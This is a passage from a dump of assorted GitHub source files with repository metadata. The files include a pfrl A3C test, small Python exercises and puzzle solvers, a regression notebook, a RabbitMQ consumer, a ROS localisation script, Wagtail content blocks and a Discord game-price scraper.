RecurrentSequential\nfrom pfrl.policies import (\n GaussianHeadWithStateIndependentCovariance,\n SoftmaxCategoricalHead,\n)\n\n\nclass _TestA3C:\n @pytest.fixture(autouse=True)\n def setUp(self):\n self.outdir = tempfile.mkdtemp()\n logging.basicConfig(level=logging.DEBUG)\n\n @pytest.mark.async_\n @pytest.mark.slow\n def test_abc(self):\n self._test_abc(\n self.t_max,\n recurrent=self.recurrent,\n episodic=self.episodic,\n discrete=self.discrete,\n )\n\n @pytest.mark.async_\n def test_abc_fast(self):\n self._test_abc(\n self.t_max,\n recurrent=self.recurrent,\n episodic=self.episodic,\n discrete=self.discrete,\n steps=10,\n require_success=False,\n )\n\n def make_model(self, env):\n hidden_size = 20\n obs_size = env.observation_space.low.size\n\n def weight_scale(layer, scale):\n with torch.no_grad():\n layer.weight.mul_(scale)\n return layer\n\n if self.recurrent:\n v = RecurrentSequential(\n nn.LSTM(num_layers=1, input_size=obs_size, hidden_size=hidden_size),\n weight_scale(nn.Linear(hidden_size, 1), 1e-1),\n )\n if self.discrete:\n n_actions = env.action_space.n\n pi = RecurrentSequential(\n nn.LSTM(num_layers=1, input_size=obs_size, hidden_size=hidden_size),\n weight_scale(nn.Linear(hidden_size, n_actions), 1e-1),\n SoftmaxCategoricalHead(),\n )\n else:\n action_size = env.action_space.low.size\n pi = RecurrentSequential(\n nn.LSTM(num_layers=1, input_size=obs_size, hidden_size=hidden_size),\n weight_scale(nn.Linear(hidden_size, action_size), 1e-1),\n GaussianHeadWithStateIndependentCovariance(\n action_size=action_size,\n var_type=\"diagonal\",\n var_func=lambda x: torch.exp(2 * x),\n var_param_init=0,\n ),\n )\n return RecurrentBranched(pi, v)\n else:\n v = nn.Sequential(\n nn.Linear(obs_size, hidden_size),\n nn.Tanh(),\n weight_scale(nn.Linear(hidden_size, 1), 1e-1),\n )\n if self.discrete:\n n_actions = env.action_space.n\n pi = nn.Sequential(\n nn.Linear(obs_size, hidden_size),\n nn.Tanh(),\n weight_scale(nn.Linear(hidden_size, n_actions), 1e-1),\n SoftmaxCategoricalHead(),\n )\n else:\n action_size = env.action_space.low.size\n pi = nn.Sequential(\n nn.Linear(obs_size, hidden_size),\n nn.Tanh(),\n weight_scale(nn.Linear(hidden_size, action_size), 1e-1),\n GaussianHeadWithStateIndependentCovariance(\n action_size=action_size,\n var_type=\"diagonal\",\n var_func=lambda x: torch.exp(2 * x),\n var_param_init=0,\n 
),\n )\n return pfrl.nn.Branched(pi, v)\n\n def _test_abc(\n self,\n t_max,\n recurrent,\n discrete=True,\n episodic=True,\n steps=100000,\n require_success=True,\n ):\n nproc = 8\n\n def make_env(process_idx, test):\n size = 2\n return ABC(\n size=size,\n discrete=discrete,\n episodic=episodic or test,\n partially_observable=self.recurrent,\n deterministic=test,\n )\n\n env = make_env(0, False)\n\n model = self.make_model(env)\n\n from pfrl.optimizers import SharedRMSpropEpsInsideSqrt\n\n opt = SharedRMSpropEpsInsideSqrt(model.parameters())\n gamma = 0.8\n beta = 1e-2\n agent = a3c.A3C(\n model,\n opt,\n t_max=t_max,\n gamma=gamma,\n beta=beta,\n act_deterministically=True,\n max_grad_norm=1.0,\n recurrent=recurrent,\n )\n\n max_episode_len = None if episodic else 2\n\n with warnings.catch_warnings(record=True) as warns:\n train_agent_async(\n outdir=self.outdir,\n processes=nproc,\n make_env=make_env,\n agent=agent,\n steps=steps,\n max_episode_len=max_episode_len,\n eval_interval=500,\n eval_n_steps=None,\n eval_n_episodes=5,\n successful_score=1,\n )\n assert len(warns) == 0, warns[0]\n\n # The agent returned by train_agent_async is not guaranteed to be\n # successful because parameters could be modified by other processes\n # after success. Thus here the successful model is loaded explicitly.\n if require_success:\n agent.load(os.path.join(self.outdir, \"successful\"))\n\n # Test\n env = make_env(0, True)\n n_test_runs = 5\n eval_returns, _ = run_evaluation_episodes(\n env,\n agent,\n n_steps=None,\n n_episodes=n_test_runs,\n max_episode_len=max_episode_len,\n )\n successful_return = 1\n if require_success:\n n_succeeded = np.sum(np.asarray(eval_returns) >= successful_return)\n assert n_succeeded == n_test_runs\n\n\n@pytest.mark.parametrize(\"t_max\", [1, 2])\n@pytest.mark.parametrize(\"recurrent\", [False])\n@pytest.mark.parametrize(\"discrete\", [True, False])\n@pytest.mark.parametrize(\"episodic\", [True, False])\nclass TestA3CSmallTMax(_TestA3C):\n @pytest.fixture(autouse=True)\n def set_params(self, t_max, recurrent, discrete, episodic):\n self.t_max = t_max\n self.recurrent = recurrent\n self.discrete = discrete\n self.episodic = episodic\n\n\n@pytest.mark.parametrize(\"t_max\", [5])\n@pytest.mark.parametrize(\"recurrent\", [True, False])\n@pytest.mark.parametrize(\"discrete\", [True, False])\n@pytest.mark.parametrize(\"episodic\", [True, False])\nclass TestA3CLargeTMax(_TestA3C):\n @pytest.fixture(autouse=True)\n def set_params(self, t_max, recurrent, discrete, episodic):\n self.t_max = t_max\n self.recurrent = recurrent\n self.discrete = discrete\n self.episodic = episodic\n","repo_name":"pfnet/pfrl","sub_path":"tests/agents_tests/test_a3c.py","file_name":"test_a3c.py","file_ext":"py","file_size_in_byte":6994,"program_lang":"python","lang":"en","doc_type":"code","stars":1097,"dataset":"github-code","pt":"85"} +{"seq_id":"2596831470","text":"# Programm zur Eingabe einiger persönlicher Daten und Ausrechnung des Alters\n\n# Eingaben\nvorname = input(\"Geben Sie Ihren Vornamen ein: \")\nnachname = input(\"Geben Sie Ihren Nachnamen ein: \")\ngebOrt = input(\"Wo sind Sie geboren? \")\ngebJahr = input(\"In welchem Jahr wurden Sie geboren? 
\")\n\n# Ausgabe der Daten\nprint(\"Name:\", vorname, nachname)\nprint(\"Geburtsort:\", gebOrt)\nprint(\"Geburtsjahr:\", gebJahr)\n\n# ab hier: neuer Teil\ngebJahr = int(gebJahr) # Zeichenkette (str) in Ganzzahl (int) umwandeln \nalter = 2016 - gebJahr # Alter berechnen\nprint(\"Alter:\", alter) # Alter ausgeben\n","repo_name":"Informatik-AG-KGN-2016/Dokumente","sub_path":"2016-11-14/hausaufgabe-loesung.py","file_name":"hausaufgabe-loesung.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10472449290","text":"from random import randint\nfrom itertools import permutations\nfrom typing import List\nfrom math import sqrt\nimport time\n\noperand = ['+', '-', '*', '/']\nstartTime = time.time()\nresult = 0\n\n\ndef get_all_possible_val(p_numlist: List) -> List[tuple]:\n \"\"\"\n get all possible value from 4 number and 4 operand with priority order (1, 2, 3, 4) not like (1, 3, 2, 4)\n\n Args:\n p_numlist (List): list of 4 number\n\n Returns:\n List: list of all posiblevalue and string for represent value\n \"\"\"\n all_possiblepos_val = dict()\n for nums in p_numlist:\n a, b, c, d = nums\n L1 = pos_val((a, str(a)), (b, str(b)))\n L2 = pos_val((c, str(c)), (d, str(d)))\n for x1, str_x1 in L1:\n for x2, str_x2 in L2:\n possible = pos_val((x1, str_x1), (x2, str_x2))\n val, equ = findClosestValue(possible, result)\n if val not in all_possiblepos_val:\n all_possiblepos_val[val] = equ\n elif len(equ) < len(all_possiblepos_val[val]):\n all_possiblepos_val[val] = equ\n if val == result and len(equ) <= 15 and \"√\" not in equ:\n print(\"found way after: \" +\n str(len(all_possiblepos_val)) + \" ways\")\n return [(val, equ)]\n\n print(\"all possible way: \" + str(len(all_possiblepos_val)) + \" ways\")\n return list(all_possiblepos_val.items())\n\n\ndef pos_val(num1: tuple(), num2: tuple()) -> List[tuple]:\n \"\"\"\n get all possible value from two number\n\n Args:\n num1 (tuple(float, string)): value of num1 and string for represent num1\n num2 (tuple(float, string)): value of num2 and string for represent num2\n\n Returns:\n list[tuple(float, string)]: all possible value and string for represent value\n \"\"\"\n pos_value = []\n\n num1, str1 = num1\n num2, str2 = num2\n pos_value += pos_val_basic((num1, str1), (num2, str2))\n pos_value += pos_val_basic((-num1, f'-{str1}'), (num2, str2))\n\n temp1 = sqrt(abs(num1))\n temp2 = sqrt(abs(num2))\n\n pos_value += pos_val_basic((temp1,\n f'root|{str1}|'), ((temp2, f'root|{str2}|')))\n pos_value += pos_val_basic((-temp1,\n f'-root|{str1}|'), ((temp2, f'root|{str2}|')))\n\n pos_value += pos_val_basic((temp1,\n f'root|{str1}|'), ((num2, str2)))\n pos_value += pos_val_basic((-temp1,\n f'-root|{str1}|'), ((num2, str2)))\n\n pos_value += pos_val_basic((num1, str1),\n ((temp2, f'root|{str2}|')))\n pos_value += pos_val_basic((-num1,\n f'-{str1}'), (temp2, f'root|{str2}|'))\n\n dic = dict()\n perfect_equ = list(filter(lambda x: x[0] == result, pos_value))\n if len(perfect_equ) == 0:\n for val, string in pos_value:\n if abs(val - result) < 20:\n if val not in dic:\n dic[val] = string\n elif len(string) < len(dic[val]):\n dic[val] = string\n\n pos_value = list(dic.items())\n return pos_value\n else:\n ansEqu = perfect_equ[0][1]\n for _, equ in perfect_equ:\n if len(equ) < len(ansEqu):\n ansEqu = equ\n if len(ansEqu) <= 20:\n return [(result, ansEqu)]\n return [(result, ansEqu)]\n\n\ndef pos_val_basic(num1: tuple(), num2: tuple()) -> List[tuple]:\n \"\"\"\n get all 
possible value from two number with basic operand (+, -, *, /)\n\n Args:\n num1 (tuple(float, string)): value of num1 and string for represent num1\n num2 (tuple(float, string)): value of num2 and string for represent num2\n\n Returns:\n list[tuple(float, string)]: all possible value and string for represent value\n \"\"\"\n pos_value = []\n num1, str1 = num1\n num2, str2 = num2\n for oper in operand:\n if oper == '/' and num2 == 0:\n continue\n # value = eval(f'{num1}{oper}{num2}')\n if oper == '+':\n value = num1 + num2\n if oper == '-':\n value = num1 - num2\n if oper == '*':\n value = num1 * num2\n if oper == '/':\n value = num1 / num2\n\n pos_value.append((value, f'({str1}{oper}{str2})'))\n return pos_value\n\n\ndef findClosestValue(all_possible_val: List, target: int) -> tuple:\n \"\"\"\n find closest value from all possible value\n\n Args:\n all_possible_val (List): list of all possible value\n target (int): target value\n\n Returns:\n tuple: closest value and string for represent value\n\n \"\"\"\n maxx = 1e9\n ansVal = 0\n ansEqu = ''\n for val, equ in all_possible_val:\n if abs(val - target) < maxx:\n maxx = abs(val - target)\n ansVal = val\n ansEqu = equ\n ansEqu = ansEqu.replace('-+', '-').replace('--', '+')\\\n .replace('+-', '-').replace('|(', '|').replace(')|', '|').replace('root', '√')\n return (ansVal, ansEqu)\n\n\ndef removeParenthesis(equ: str) -> tuple:\n \"\"\"\n Remove unnecessary parenthesis\n\n Args:\n equ (str): equation\n\n Returns:\n tuple: value and equation\n \"\"\"\n val, equ = equ\n parenthesis = []\n remove = True\n for i in range(len(equ)):\n if len(parenthesis) != 0:\n if parenthesis[0] != 0:\n remove = False\n break\n if equ[i] == '(':\n parenthesis.append(i)\n elif equ[i] == ')':\n parenthesis.pop(-1)\n if remove:\n equ = equ[1:-1]\n return (val, equ)\n\n\ndef main():\n global result\n numlist = [randint(0, 9) for _ in range(4)]\n while(numlist.count(0) >= 2):\n numlist = [randint(0, 9) for _ in range(4)]\n result = randint(0, 2400)//100\n\n p_numlist = list(permutations(numlist))\n prototype = f'{numlist[0]} {numlist[1]} {numlist[2]} {numlist[3]} = {result}'\n print(prototype)\n\n all_possible = get_all_possible_val(p_numlist)\n best_way = findClosestValue(all_possible, result)\n best_way = removeParenthesis(best_way)\n val, equ = best_way\n\n print(f'best way: {equ} = {val}')\n print(f'cost time: {time.time()-startTime:.2f}s')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JiMeow/4num_toresult_sol","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"70232579799","text":"\"\"\"\n Solution to the - https://open.kattis.com/problems/downtime\n\n The approach to the solution is to maintain an in-progress double-ended queue to hold the current requests.\n As the minimum number of servers needed can only be exceeded when the new requests are coming in we do the next:\n 1. When the new request comes in we add it to the end of the deque\n 2. Then we drop all requests processed already after the previous request came in from the begining of the deque\n 3. Then we see how many requests are in progress and how many servers needed to serve them\n 4. If that number of servers is larger than what we've seen before, we update the new minimum\n 5. 
Once all the requests are processed, the largest observed minimum is returned as the result\n\"\"\"\n__author__ = \"Taras Basiuk\"\n\nfrom collections import deque\n\nif __name__ == \"__main__\":\n n, k = tuple(map(int, input().strip().split())) # Read in N and K\n\n min_serv = 0 # Minimum number of servers needed to handle the workload\n in_progress = deque([]) # Double-ended queue(deque) holding all the timestamps of the requests currently in progress\n\n for _ in range(n): # For each of N timestamps\n ct = int(input().strip()) # Read in the next timestamp\n\n in_progress.append(ct) # Add the timestamp of the current request to the end of the in_progress deque\n\n # Now remove all the jobs from the beginning of the in_progress deque which must've been processed by now\n while in_progress[0] <= ct - 1000:\n in_progress.popleft()\n\n cip = len(in_progress) # Record how many jobs are actually currently in progress(cip)\n cur_serv = (cip // k) + (1 if cip % k > 0 else 0) # Calculate how many servers are processing current requests\n\n # Update the minimum number of servers needed to handle the workload, if appropriate\n min_serv = cur_serv if cur_serv > min_serv else min_serv\n\n print(min_serv) # Output the result\n","repo_name":"BasiukTV/coding-problems","sub_path":"kattis/downtime/taras_basiuk.py","file_name":"taras_basiuk.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"3660903919","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # GRIP - THE SPARK FOUNDATION\n# \n# ### DATA SCIENCE & BUSINESS ANALYTICS INTERNSHIP\n# \n# ## NIRMAL JOY\n\n# ## TASK 1 - : PREDICTION USING SUPERVISED ML\n\n# \n# ### PREDICT THE PERCENTAGE OF AN STUDENT BASED ON THE NO. OF STUDY HOURS\n# \n\n# ### 1. IMPORT REQUIRED LIBRARIES\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\n\n\n# ### 2. IMPORTING DATASET\n\n# In[2]:\n\n\nScore = pd.read_csv(r'C:\\Users\\vpare\\OneDrive\\Desktop\\Virtual internship\\GRIP\\TS1\\Score.csv')\nprint(\"Dataset imported...\")\n\n\n# In[3]:\n\n\nScore.head()\n\n\n# ## 3. DATA VISUALIZATION\n\n# ### 3.1 PLOTTING THE DISTRIBUTION HOURS AND SCORES ON SCATTER PLOTS\n\n# In[4]:\n\n\nplt.scatter(x=\"Hours\",y=\"Scores\",data=Score)\nplt.title(\"Hours vs Percentage\")\nplt.xlabel(\"Hours Studied\")\nplt.ylabel(\"Percentage Score\")\n\n\n# ### 3.2 UNIVARIATE VISUALIZATION\n\n# In[5]:\n\n\nScore.hist(grid=False,figsize=(8,3))\nplt.show()\n\n\n# ## 4. DATA PREPERATION\n\n# In[6]:\n\n\nx =Score.drop(columns=[\"Scores\"])\ny = Score[\"Scores\"]\n\n\n# In[7]:\n\n\nx_train, x_test, y_train, y_test = train_test_split(x,y,test_size=0.2, random_state=0)\nprint(f\"--> training data points {x_train.shape[0]} and testing data points {x_test.shape[0]}\")\n\n\n# ## 5. TRAINING THE ALGORITHM\n\n# In[8]:\n\n\nregressor = LinearRegression()\nregressor.fit(x_train,y_train)\nprint(\"training is Completed \")\n\n\n# ### 5.1 PLOTTING REGRESSION LINE\n\n# In[9]:\n\n\nprint(f\"--> Equation of line y = {np.round(regressor.coef_[0],2)}*x+{np.round(regressor.intercept_,2)}\")\n\n\n# In[10]:\n\n\nplt.scatter(x_train,y_train)\nplt.xlabel(\"Hours\")\nplt.ylabel(\"Scores\")\nplt.plot(x_train,regressor.predict(x_train),\"m\")\nplt.show()\n\n\n# ## 6. 
MAKING PREDICTIONS ON TESTING DATA\n\n# In[11]:\n\n\nprint(x_test) #testing data\n\n\n# In[12]:\n\n\ny_pred = regressor.predict(x_test)\n\n\n# In[13]:\n\n\nprint(\"Comparing actual data and predicted data\")\ndf = pd.DataFrame({\"Actual\":y_test, \"Predicted\": y_pred})\ndf\n\n\n# ### 6.1 PLOTTING LINE ON TESTING DATA\n\n# In[14]:\n\n\nplt.scatter(x_test,y_test)\nplt.xlabel(\"Hours\")\nplt.ylabel(\"Scores\")\nplt.plot(x_test,regressor.predict(x_test),\"g\")\nplt.show()\n\n\n# ## 7. TESTING AND FINDING PREDICTION FOR 9.25 HOURS STUDY/DAY\n\n# In[15]:\n\n\nhours = 9.25\nown_pred = regressor.predict([[hours]])\nprint(f\"No of Hours = {hours}\")\nprint(f\"predicted Score = {own_pred[0]}\")\n\n\n# ## 8. EVALUATING MODEL\n\n# In[16]:\n\n\nprint(\"Mean Absolute Error:\",metrics.mean_absolute_error(y_test,y_pred))\nprint(\"Mean squared Error:\",metrics.mean_squared_error(y_test,y_pred))\nprint(\"r2 Score:\",metrics.r2_score(y_test,y_pred))\n\n\n# # Thank you ❤❤\n","repo_name":"Nirmaljoey/TSF-GRIP","sub_path":"Prediction using supervised machine learning.py","file_name":"Prediction using supervised machine learning.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"15602147404","text":"# -*- coding: utf8 -*-\n\nfrom typing import Union\nfrom linked_list import ListNode\n\n\ndef get_linked_list_length(head: ListNode) -> int:\n length = 0\n while head is not None:\n length += 1\n head = head.next\n return length\n\n\ndef get_intersect_node(headA: ListNode, headB: ListNode) -> Union[ListNode, None]:\n lenA = get_linked_list_length(headA)\n lenB = get_linked_list_length(headB)\n if lenA >= lenB:\n for _ in range(lenA - lenB):\n headA = headA.next\n else:\n for _ in range(lenB - lenA):\n headB = headB.next\n while headA is not None:\n if headA == headB:\n return headA\n headA = headA.next\n headB = headB.next\n return None\n\n\ndef get_intersect_node2(headA: ListNode, headB: ListNode) -> Union[ListNode, None]:\n \"\"\"\n 走的快的一定会追上走的慢的\n 一个链表走完就去走另一条列表\n :param headA:\n :param headB:\n :return:\n \"\"\"\n cur_a, cur_b = headA, headB\n while cur_a != cur_b:\n cur_a = cur_a.next if cur_a else headB\n cur_b = cur_b.next if cur_b else headA\n return cur_a\n","repo_name":"Sisyphus235/daily_tech","sub_path":"Algorithms/linked_list/leetcode02_07/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8312664349","text":"import asyncio\n\nfrom aio_pika.abc import AbstractIncomingMessage\n\nfrom adapters.rabbit import RMQ\nfrom core.config import settings\nfrom core.logger import logger\nfrom worker import request_async_api\n\n\nasync def main():\n rabbit = RMQ()\n\n await rabbit.connect(settings.get_amqp_uri(), queue_name=\"voice_service\")\n await rabbit.queue.bind(rabbit.exchange, routing_key=\"events.files\")\n\n async with rabbit.queue.iterator() as iterator:\n message: AbstractIncomingMessage\n async for message in iterator:\n async with message.process(ignore_processed=True):\n logger.info(\"Получено новое сообщение в очереди\")\n # request_async_api(message)\n request_async_api.delay(message.body)\n await message.ack()\n\n\nif __name__ == \"__main__\":\n logger.info(\"Сервис запустился\")\n 
asyncio.run(main())\n","repo_name":"uspanych/voice_assistant","sub_path":"voice_service/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"41413297272","text":"import urllib, os, re, requests, discord, wikipedia\nfrom bs4 import BeautifulSoup\nfrom tools import updateCounter, searchResultsTest\nfrom currency_converter import CurrencyConverter\n\n# Searches youtube, taking a query and a result number as parameters\n# and returning a url\n\nasync def search(query, n, prefix=None):\n queryString = urllib.parse.quote_plus(query)\n queryString = queryString.replace(\"%20\", \"+\")\n url = 'https://www.pricecharting.com/search-products?q=\"' + queryString + '\"&type=prices'\n page = requests.get(url)\n soup = BeautifulSoup(page.text, features='html.parser')\n if soup.find(id=\"games_table\"):\n values = scrapeFromSearch(soup.find(id=\"games_table\"))\n else:\n values = scrapeFromPage(soup, page.url)\n if searchResultsTest(values, n) != 0:\n return searchResultsTest(values, n)\n return values[n]\n\ndef scrapeFromSearch(soup):\n values = []\n lastName = \"\"\n for rows in soup.findAll('tr'):\n temp = {}\n for cols in rows.findAll('td'):\n classList = cols.get('class')\n if cols.find('a'):\n if cols.find('a').find('span'):\n temp[classList[len(classList) - 1]] = cols.find('a').find('span').string.strip()\n else: \n temp[classList[len(classList) - 1]] = cols.find('a').string.strip()\n temp['link'] = cols.find('a')['href']\n elif cols.find('span'):\n temp[classList[len(classList) - 1]] = cols.find('span').string\n else:\n temp[classList[len(classList) - 1]] = cols.string.strip()\n if len(temp) < 1:\n continue\n if temp['title'] != lastName:\n values.append({temp['title']:[]})\n lastName = temp['title']\n del temp['title']\n del temp['add_to']\n values[len(values)-1][lastName].append(temp)\n else:\n del temp['title']\n del temp['add_to']\n values[len(values)-1][lastName].append(temp)\n return values\n\n\ndef scrapeFromPage(soup, url):\n try:\n temp = soup.find(id=\"product_name\").getText().split(\"\\n\")\n except:\n return -1\n names = []\n for i in range(len(temp) - 1):\n if temp[i].isspace() == True or not temp[i] or temp[i] == '':\n continue\n names.append(temp[i].strip())\n try:\n used = soup.find(id=\"used_price\").find(\"span\").getText().strip()\n cib = soup.find(id=\"complete_price\").find(\"span\").getText().strip()\n new = soup.find(id=\"new_price\").find(\"span\").getText().strip()\n except:\n return -1\n value = [{names[0]:[{'console':names[1],\n 'used_price':used,\n 'cib_price':cib,\n 'new_price':new,\n 'link':url\n }]}]\n return value\n\ndef getImageUrl(url):\n page = requests.get(url)\n soup = BeautifulSoup(page.text, features='html.parser')\n for links in soup.findAll(\"div\", {\"class\": \"cover\"}):\n link = links.find('img')['src']\n if not urllib.parse.urlparse(link).netloc:\n link = \"https://www.pricecharting.com\" + link\n return link\n\ndef getFormattedRow(value):\n string = \"Loose: \"\n if value['used_price'] in [\"\", None, \"N/A\"]:\n string = string + \"Unknown or N/A\\nCIB: \"\n else:\n string = string + parseDollar(value['used_price']) + \"\\nCIB: \"\n if value['cib_price'] in [\"\", None, \"N/A\"]:\n string = string + \"Unknown or N/A\\nNew: \"\n else:\n string = string + parseDollar(value['cib_price']) + \"\\nNew: \"\n if value['new_price'] in [\"\", None, \"N/A\"]:\n string = string + \"Unknown or N/A\"\n else:\n string = string + 
parseDollar(value['new_price'])\n return string\n \ndef parseDollar(dollar):\n return \"£\" + str(\"%.2f\" % round(CurrencyConverter() .convert(dollar[1:], 'USD', 'GBP'), 2))\n\nasync def getEmbed(results, colour):\n if results == -1:\n return None\n for key, values in results.items():\n wiki = getWiki(key + \" \" + values[0]['console'])\n e = discord.Embed(title=key, url=wiki, colour=colour)\n for value in values:\n cover = getImageUrl(value['link'])\n e.set_thumbnail(url=cover)\n e.add_field(\n name = value['console'],\n value = getFormattedRow(value),\n inline=False\n )\n return e\n\ndef getWiki(query):\n search = wikipedia.search(query, results=10)\n if len(search) == 0:\n return None\n for i in range(len(search) - 1):\n try:\n categories = wikipedia.page(str(search[i]), auto_suggest=0).categories\n url = wikipedia.page(str(search[i]), auto_suggest=0).url\n except:\n continue\n else:\n for j in range(len(categories) - 1):\n if \"video games\" in categories[j].lower():\n return url\n return None\n","repo_name":"vertigo65536/genei-jin","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"2042341674","text":"import sys\nfrom geometry_msgs.msg import Twist\nimport rospy\nimport operator\nfrom take_photo import TakePhoto\nimport cv2 as cv\nfrom find_match import FindMatch\nimport pickle\nimport time\n\ncamera = TakePhoto()\ntwist = Twist()\nfind = FindMatch()\n\nquery_descriptors = []\nquery_keypoints = []\ngood_matches = []\ndescriptors_dataset = []\ndataset_names = []\nminHessian = 400\n\n\ndef move():\n\n # read dataset descriptors and locations\n with open('dataset2/dataset2_descriptors.txt', 'rb') as fp:\n descriptors_dataset = pickle.load(fp)\n with open('dataset2/dataset2_names.txt', 'rb') as fp:\n dataset_names = pickle.load(fp)\n\n pub = rospy.Publisher('cmd_vel_mux/input/navi', Twist, queue_size=10)\n rospy.init_node('teleop_py',anonymous=True)\n rate = rospy.Rate(1)\n\n while not rospy.is_shutdown():\n good_matches = []\n query_descriptors = []\n query_keypoints = []\n\n #twist.angular.z = 0.5\n #pub.publish(twist)\n index = 0\n img_title ='query_robot/queryImg.jpg'\n camera.take_picture(img_title)\n\n queryImg = cv.imread(img_title, cv.IMREAD_GRAYSCALE)\n if queryImg is None:\n print('Could not open or find the query image!')\n exit(0)\n\n # print(queryImg)\n # call functions for feature extraction\n find.getQueryDescriptor(query_descriptors, query_keypoints, queryImg)\n # print(query_descriptors)\n # print(len(descriptors_dataset))\n find.match(good_matches, descriptors_dataset, query_descriptors)\n # print(len(good_matches))\n\n # find max number of matches - assume best match\n index, value = max(enumerate(good_matches), key=operator.itemgetter(1))\n best_match = dataset_names[index]\n print('i am in ' + best_match)\n rate.sleep()\n\n # t0 = time.time()\n # # computation time\n # t1 = time.time()\n # time_taken = t1-t0\n # print('computation time: ' + str(time_taken) + 's')\n\n\nif __name__ == '__main__':\n try:\n # getReady(dataset_names, descriptors_dataset)\n\n move()\n except rospy.ROSInterruptException:\n pass\n\n# move()\n","repo_name":"akollaki/cv_localisation","sub_path":"scripts_v1/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73529533717","text":"from wagtail import VERSION as 
WAGTAIL_VERSION\nfrom wagtail.contrib.table_block.blocks import TableBlock\n\nif WAGTAIL_VERSION >= (3, 0):\n from wagtail.blocks import (\n ChoiceBlock,\n RichTextBlock,\n TextBlock,\n StructBlock,\n StreamBlock,\n )\n from wagtail.documents.blocks import DocumentChooserBlock\n from wagtail.embeds.blocks import EmbedBlock\n from wagtail.images.blocks import ImageChooserBlock\nelse:\n from wagtail.core.blocks import (\n ChoiceBlock,\n RichTextBlock,\n TextBlock,\n StructBlock,\n StreamBlock,\n )\n from wagtail.documents.blocks import DocumentChooserBlock\n from wagtail.embeds.blocks import EmbedBlock\n from wagtail.images.blocks import ImageChooserBlock\n\nfrom wagtailcodeblock.blocks import CodeBlock\n\n\nclass CaptionedImageBlock(StructBlock):\n \"\"\"\n An image block with a caption, credit, and alignment.\n \"\"\"\n\n image = ImageChooserBlock(\n help_text=\"The image to display.\",\n )\n caption = TextBlock(\n required=False, help_text=\"The caption will appear under the image, if entered.\"\n )\n credit = TextBlock(\n required=False, help_text=\"The credit will appear under the image, if entered.\"\n )\n align = ChoiceBlock(\n choices=[\n (\"left\", \"Left\"),\n (\"right\", \"Right\"),\n (\"center\", \"Center\"),\n (\"full\", \"Full Width\"),\n ],\n default=\"left\",\n help_text=\"How to align the image in the body of the page.\",\n )\n\n class Meta:\n icon = \"image\"\n template = \"wagtailcontentstream/blocks/captioned_image.html\"\n help_text = \"Select an image and add a caption (optional).\"\n\n\nclass ContentStreamBlock(StreamBlock):\n \"\"\"\n Contains the elements we'll want to have in a Content Stream.\n \"\"\"\n\n heading = TextBlock(\n icon=\"title\",\n template=\"wagtailcontentstream/blocks/heading.html\",\n )\n paragraph = RichTextBlock(\n icon=\"pilcrow\",\n features=[\"bold\", \"italic\", \"link\", \"ol\", \"ul\", \"monospace\"],\n )\n image = CaptionedImageBlock()\n document = DocumentChooserBlock()\n embed = EmbedBlock(icon=\"media\")\n table = TableBlock(icon=\"table\")\n code = CodeBlock(icon=\"code\")\n\n class Meta:\n help_text = \"The main page body.\"\n\n\nclass ContentStreamBlockWithRawCode(ContentStreamBlock):\n raw_code = CodeBlock(\n icon=\"code\",\n language=\"html\",\n template=\"wagtailcodeblock/raw_code.html\",\n )\n\n\nclass SectionStructBlock(StructBlock):\n \"\"\"\n Contains the elements we'll want to have in a Sectioned Content Stream block.\n \"\"\"\n\n section_heading = TextBlock(\n icon=\"title\",\n help_text=\"Heading for this section.\",\n )\n body = ContentStreamBlock(\n help_text=\"The body content goes here.\",\n )\n\n class Meta:\n template = \"wagtailcontentstream/blocks/section_struct_block.html\"\n icon = \"doc-full-inverse\"\n\n\nclass SectionBlock(StreamBlock):\n \"\"\"\n Streamblock to associate multiple blocks with a section.\n \"\"\"\n\n section = SectionStructBlock()\n\n class Meta:\n help_text = \"The main page body.\"\n","repo_name":"FlipperPA/wagtailcontentstream","sub_path":"wagtailcontentstream/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"85"} +{"seq_id":"27784802490","text":"# -*- coding: utf-8 -*-\nimport os\nimport click\nimport logging\nfrom dotenv import find_dotenv, load_dotenv\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.base import TransformerMixin, BaseEstimator\nfrom sklearn.preprocessing import StandardScaler\n\nfrom ds_mega.data.extractors import 
